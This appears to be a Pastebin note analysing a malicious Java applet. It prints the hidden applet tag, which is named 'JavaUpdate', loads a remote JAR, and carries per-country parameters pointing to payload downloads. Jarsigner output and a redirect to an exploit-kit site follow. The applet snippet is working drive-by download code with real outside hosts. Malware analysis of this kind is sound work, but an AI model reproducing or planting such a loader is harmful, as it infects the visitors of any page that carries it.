Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Interesting how it has a different parameters based on country code - US, CA, UK and NL.
- <applet name="JavaUpdate" code="SecureApplet.class" archive="http://secure-jar.com/TXDP/Java.jar" width="0" height="0">
- <param name="us" value="javasan.exe">
- <param name="ca" value="http://ge.tt/api/1/files/6xpAHbD1/0/blob?download">
- <param name="uk" value="http://www.listentobitcoin.com">
- <param name="nl" value="fox33">
- JAR file is obfuscated with ZKM. It's signed with a certificate:
- s 231 Thu Jan 02 15:40:22 KRAT 2014 META-INF/MANIFEST.MF
- X.509, CN=James Patrick, OU=EU, O=EU, L=Amsterdam, ST=Amsterdam, C=NL
- [certificate will expire on 02.04.14 23:40]
- [CertPath not validated: Path does not chain with any of the trust anchors]
- 320 Thu Jan 02 15:40:22 KRAT 2014 META-INF/RAZMATAZ.SF
- 1065 Thu Jan 02 15:40:22 KRAT 2014 META-INF/RAZMATAZ.DSA
- 0 Thu Jan 02 15:36:24 KRAT 2014 META-INF/
- sm 4943 Thu Jan 02 15:36:24 KRAT 2014 SecureApplet.class
- X.509, CN=James Patrick, OU=EU, O=EU, L=Amsterdam, ST=Amsterdam, C=NL
- [certificate will expire on 02.04.14 23:40]
- [CertPath not validated: Path does not chain with any of the trust anchors]
- s = signature was verified
- m = entry is listed in manifest
- k = at least one certificate was found in keystore
- i = at least one certificate was found in identity scope
- jar verified.
- Warning:
- This jar contains entries whose signer certificate will expire within six months.
- This jar contains entries whose certificate chain is not validated.
- Once the JAR file is executed it sends the browser to epickit.net to grab something else. I'm getting the following message though.
- The owner of this website (epickit.net) has banned your access based on your browser's signature (ecb9341fedc02dd-ua93).
- So, EpicKit, ah...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement